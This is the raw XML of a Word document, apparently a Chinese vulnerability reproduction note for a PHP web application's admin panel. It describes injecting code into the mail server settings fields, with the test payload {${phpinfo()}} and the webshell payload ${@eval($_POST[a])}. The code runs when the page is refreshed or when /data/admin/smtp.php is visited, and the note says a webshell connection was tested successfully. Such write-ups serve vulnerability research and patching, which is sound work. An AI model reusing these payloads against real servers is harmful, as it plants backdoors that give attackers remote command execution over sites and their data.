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eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>漏洞复现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登录后台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点击系统然后点击邮件服务器设置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5255895" cy="26847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在下面的框中的任意框中写入代码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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>phpinfo()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>为例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需要写入{${phpinfo()}}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如果要写入一句话木马可以写入${@eval($_POST[a])}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经测试也可以连接成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5263515" cy="2341880"/>
            <wp:effectExtent l="0" t="0" r="1968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然后直接刷新页面即可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或者直接访问根路径下的/data/admin/smtp.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4871720" cy="268097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24425" cy="2569845"/>
            <wp:effectExtent l="0" t="0" r="3175" b="209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59AD"/>
    <w:rsid w:val="3BBDB3C0"/>
    <w:rsid w:val="7FBF55B7"/>
    <w:rsid w:val="7FF933AB"/>
    <w:rsid w:val="E4FECABF"/>
    <w:rsid w:val="EFFF59AD"/>
    <w:rsid w:val="F7FFA241"/>
    <w:rsid w:val="FF7F8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2022-03-16T18:01:00Z</dcterms:created>
  <dc:creator>ming</dc:creator>
  <cp:lastModifiedBy>ming</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-24T22:06:24Z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